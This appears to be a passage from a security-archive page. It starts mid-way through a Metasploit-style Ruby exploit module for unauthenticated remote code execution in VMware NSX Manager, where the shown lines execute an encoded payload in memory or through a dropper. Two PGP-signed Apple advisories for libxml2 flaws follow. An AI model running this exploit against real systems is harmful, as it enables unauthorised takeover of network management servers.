CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')  end  def exploit    case target['Type']    when :in_memory      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend

VMware NSX Manager XStream Unauthenticated Remote Code Execution

Apple Security Advisory 2022-11-09-2 - macOS Ventura 13.0.1 addresses code execution and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1

macOS Ventura 13.0.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213504.

libxml2  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNQACgkQ4RjMIDke  
NxkkbBAAsAYMux+v/27NK6+FvyxrTRLkR0yyzp8SorMSfPwZInNGkkEmQxjSzI0+  
D3rK9usf/pouEV9LMnR+Uf37pEdlpSDD7uXZ81m1vhN6RPkz2qD5WdM46RaWTbAS  
/xe3ZEu8+Jpr5SQSWuI+QIBr/vn9Txu/N6l/WQVxnWS+RSWO6tZLLOXMEyVk9vPx  
XJGyQywt3XYoVksvzwAgm/2yslQ+0OWphWjLp73bjQGrrIiClphxmtyvA0SN8Nds  
Ah0+X8SRjCErSN4736U1htKtClSHDowdaD2wevGGUrdRSLJQLTPPkqUPF3P/4/8i  
xW42Zgf9qucN9O89P7ONvHOIe8swtD9vf1AjFXvsDqQvMZQVFDBNXbG138V4LLws  
f5UdpUmY/0lSnVpAZQlo+xuMJSb3SMWYIB2ozhzDLHgBKTxERFB7uyrEYQgXs9XB  
1qg+BbW5uooEoMKbutw36/II/JTFRM34QxWiOJHw4cCypmuaGkSJ/8jsTJDlRvG/  
T9BchgHjBvqHFtCVNLGikkVYzEVQnQLXQAZoZMCYV0benebEIFLIaObaciQqA3F2  
N7/rvpXd5l6G3sEGwqMPT5aYj6Vm/0LBnxuTlN1xN1wgOQoS+LWL8bW+8/HjtJLa  
eyWMh8yD0o02Hf6dNIl9RTuoAKwZvmJbeqi/1uEaoL8sAP9gK1s=CjcG  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-11-09-2

Apple Security Advisory 2022-11-09-1 - iOS 16.1.1 and iPadOS 16.1.1 addresses code execution and integer overflow vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1iOS 16.1.1 and iPadOS 16.1.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213505.libxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An integer overflow was addressed through improved inputvalidation.CVE-2022-40303: Maddie Stone of Google Project Zerolibxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: This issue was addressed with improved checks.CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google ProjectZeroAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNIACgkQ4RjMIDkeNxl2og/7Bwq+DwNmc4conLeNZ/4RVZ8Abf2kKMj71ZJrSov1lvW6W9l3NswznKc9pV0Cack8zm1she6dr+HNMYFcsSbFF/OTPKsf2jlZ3aZY5on7FpDdzB8bLDbw0dvSnO2Oc1mgcsBMIuSJBliUfgF0d6L6Hrj7L8Ja0pQP0W5BhcbWbd91wgj2KAQpaX6rgh7oEy7W5GRPJwLAdOfHmpzWws+PjZ3DMlLuGvGRLwEyizsLbq6rX166KG+asXZzCeWygTuKKcpZHG6FwahogBFnfl1ccTGJv4UV/9Ks3WEaZCGx5lpkgw+5H9Wx2HgXTr9Sh01CQVADadfeGp/Iat0TE2hscMZaTm2A1ZdmOeyK70r0jXvCCHtna9spbPO7N0OBERsqS9fC+X/XVHuehIzoUXxFUJAuaXD2weBZHJZBZ7MoUqNm50taDqoYUX0yB2BU0uWOitKfghLRBuFhpuUZtRaZdRfDLSEjSxCTCtGwWnIj4lLlZbE9RAwNNCU12+z6pHHlTxZ9c6IiQF8mrIx4IJ0OMIk6oH3gm71l8T5FSMiLCcuInL0XwC5ragJ/irrxq3GuXL8x+3BjgxnRy4kKy6KUwZsLFp7OI71X/hyjEIyhcXopiRz0PXrooluRUtooyxSCV8M9u3658pFT2+X4WvQASmk3z+ZUnTBQXrfNgWkxyUs=JERa-----END PGP SIGNATURE-----

Tag

#js